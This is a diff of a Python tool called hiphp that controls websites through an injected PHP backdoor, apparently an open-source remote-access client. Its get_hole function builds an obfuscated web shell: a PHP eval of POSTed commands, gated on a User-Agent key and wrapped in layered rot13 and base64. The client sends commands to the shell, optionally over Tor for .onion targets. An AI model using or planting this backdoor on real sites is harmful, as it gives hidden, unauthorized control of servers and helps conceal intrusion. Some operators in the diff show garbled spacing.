skipped 15 lines 16 16 from hiphp.hiphpphpfunctions import * 17 17 from hiphp.hiphphelp import help 18 18 from hiphp.hiphpmsgs import * 19 + from hiphp.hiphplicense import license 20 + from hiphp.hiphpabout import about 19 21 from ashar import * 20 22 from hexor import * 21 23 from asciitext import * skipped 2 lines 24 26 import ast 25 27 #import readline 26 28 from os.path import exists 29 + from biglibrary import * 27 30 28 31 #start hiphp class: 29 32 class hiphp: skipped 27 lines 57 60 logo="" 58 61 if self.do_x==0: 59 62 spas=" "*5 63 + code_by=self.color.c("Code by -> ",self.c_yellow)+self.color.c("yasserbdj96",self.c_green) 60 64 logo+=self.color.c(f""" 61 65 {spas} ▄███████▄ ▄█ █▄ ▄███████▄ 62 66 {spas} ███ ███ ███ ███ ███ ███ 63 67 {spas}╦ ╦ ███ ███ ███ ███ ███ ███ 64 68 {spas}║ ║ ═╦═ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀ 65 69 {spas}╠═══╣ ║ ███ ███ ███ ███ 66 - {spas}║ ║ ║ ███ ███ ███ ███ 67 - {spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ V0 . 2 . 19 \n""",self.c_red) 68 - logo+=self.color.c(" "*37 +"Code by - > " , self .c_yellow ) + self . color . c ( " yasserbdj96\n",self.c_green ) 69 - logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue) 70 - logo+=self.color.c(" - If you are having difficulties controlling the program, you can type '--help' for more informations.\n",self.c_yellow) 70 + {spas}║ ║ ║ ███ V0 . 2 . 20 ███ ███ ███ 71 + {spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ { code_by } \n""",self.c_red) 72 + logo+=self.color.c(" "*17 +"https : / / github .com / yasserbdj96\n",self.c_blue ) 73 + #logo+=self.color.c(" "*37+"Code by -> ",self.c_yellow)+self.color.c("yasserbdj96\n",self.c_green) 74 + #logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue) 75 + logo+=self.color.c("\n - '--help' for more informations.\n",self.c_yellow) 71 76 logo+=self.color.c(" - '--exit' OR 'Ctrl+C' for exit :)\n\n",self.c_yellow) 72 77 self.do_x+=1 73 78 # skipped 24 lines 98 103 #exit 99 104 elif command[0:6]=="--exit": 100 105 exit() 106 + #license 107 + elif command[0:9]=="--license": 108 + print(license()) 109 + #about 110 + elif command[0:7]=="--about": 111 + print(about()) 101 112 #ls 102 113 elif command[0:4]=="--ls": 103 114 if len(command)==4: skipped 7 lines 111 122 command=scandir(dirx) 112 123 sd=hiphp.do(self,self.key,self.url,self.headers,True,command) 113 124 x=ast.literal_eval(sd) 125 + 126 + 114 127 for i in range(len(x)): 115 128 if x[i]!="." and x[i]!="..": 116 - print ( x[i].replace("\/","/") ) 129 + x [ i ] = x[i].replace("\/","/") 130 + 131 + biglibrary().lslist(x,separator=" | ") 117 132 #set 118 133 elif command[0:5]=="--set": 119 134 self.set+=command[6:] 120 135 #delete set 121 136 elif command[0:6]=="--dset": 122 137 self.set="" 138 + #clear 139 + elif command[0:5]=="--cls": 140 + os.system('cls' if os.name == 'nt' else 'clear') 123 141 #Get the hole Code 124 - elif command[0:6]=="--geth": 125 - hiphp.get_hole(self) 142 + elif command[0:6]=="--geth" or command [ 0 : 15 ] = = " HIPHP_HOLE_CODE " : 143 + hiphp.get_hole(self, get = True ) 126 144 #cat 127 145 elif command[0:5]=="--cat": 128 146 dirx=command[6:] skipped 5 lines 134 152 135 153 if varss[len(varss)-1]=="": 136 154 del varss[len(varss)-1] 137 - hiphp.run_file(self,varss[1],varss[2:]) 155 + print ( hiphp.run_file(self,varss[1],varss[2:]) ) 138 156 #up 139 157 elif command[0:4]=="--up": 140 158 try: skipped 13 lines 154 172 def do(self,key,url,header,retu,command): 155 173 regex = re.compile(r"^https?\:\/\/[\w\-\.]+\.onion") 156 174 proxies = {'http': 'socks5h://127.0.0.1:9150','https': 'socks5h://127.0.0.1:9150'} 157 - if regex.match(url): 158 - #.onion 159 - response=requests.post(url,headers=header,proxies=proxies) 160 - else: 161 - response=requests.post(url,headers=header) 162 - #response=requests.post(url,headers=header) 163 - # 164 - if response.status_code==200: 165 - key_len=len(key)+1 166 - # if the key are true: 167 - if response.text[0:key_len]=="#"+key: 168 - ploads={'command':self.set+command} 169 - if ".onion" in url: 170 - response=requests.post(url,headers=header,data=ploads,proxies=proxies) 171 - else: 172 - response=requests.post(url,headers=header,data=ploads) 173 - response_text=response.text[key_len:] 174 - if retu==True: 175 - return response_text 176 - else: 177 - if len(response_text)!=0: 178 - print(response_text) 175 + 176 + try: 177 + if regex.match(url): 178 + #.onion 179 + response=requests.post(url,headers=header, proxies = proxies ) 179 180 else: 180 - if retu==True: 181 - return emsg_1 181 + response=requests.post(url,headers=header) 182 + #response=requests.post(url,headers=header) 183 + # 184 + if response.status_code==200: 185 + key_len=len(key)+1 186 + # if the key are true: 187 + if response.text[0:key_len]=="#"+key: 188 + ploads={'command':self.set+command} 189 + if ".onion" in url: 190 + response=requests.post(url,headers=header,data=ploads,proxies=proxies) 191 + else: 192 + response=requests.post(url,headers=header,data=ploads) 193 + response_text=response.text[key_len:] 194 + if retu==True: 195 + return response_text 196 + else: 197 + if len(response_text)!=0: 198 + print(response_text) 182 199 else: 183 - hexor().c(emsg_1,self.c_red) 184 - exit() 185 - else: 200 + if retu==True: 201 + return emsg_1 202 + else: 203 + hexor().c(emsg_1,self.c_red) 204 + exit() 205 + except: 186 206 hexor().c(emsg_3+" '"+url+"'.",self.c_red) 187 207 exit() 188 208 skipped 1 lines 190 210 def run_file(self,file_path,*opts): 191 211 if exists(file_path): 192 212 open_file=open(file_path).read() 213 + 193 214 if open_file[0:5]=="<?php": 194 215 open_file=open_file[6:] 195 216 if open_file[len(open_file)-2:len(open_file)]=="?>": skipped 36 lines 232 253 self.color2.c(f"{emsg_5} '{path_to_upluad}'.",self.c_red) 233 254 234 255 #get the hole: 235 - def get_hole(self): 256 + def get_hole(self, get = False ): 236 257 code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}" 237 258 code=rot13(tobase64(rot13(tobase64(rot13(code))))) 238 259 code=f"eval(str_rot13(base64_decode(str_rot13(base64_decode(str_rot13('{code}'))))));" 239 260 php_s="/*php code start*/" 240 261 php_e="/*php code end*/" 241 - if self.retu==True: 262 + 263 + if self.retu==True and get==False: 242 264 return php_s+"\n"+code+"\n"+php_e 243 265 else: 244 - self.color2 .c(msg_1,self.c_yellow) 245 - self.color2 .c(php_s,self.c_red) 246 - self.color2 .c(code,self.c_green) 247 - self.color2 .c(php_e,self.c_red) 266 + geth = self.color .c(msg_1+ " \ n " ,self.c_yellow) 267 + geth + = self.color .c(php_s+ " \ n " ,self.c_red) 268 + geth + = self.color .c(code+ " \ n " ,self.c_green) 269 + geth + = self.color .c(php_e,self.c_red) 270 + print(geth) 248 271 #}END. 249 272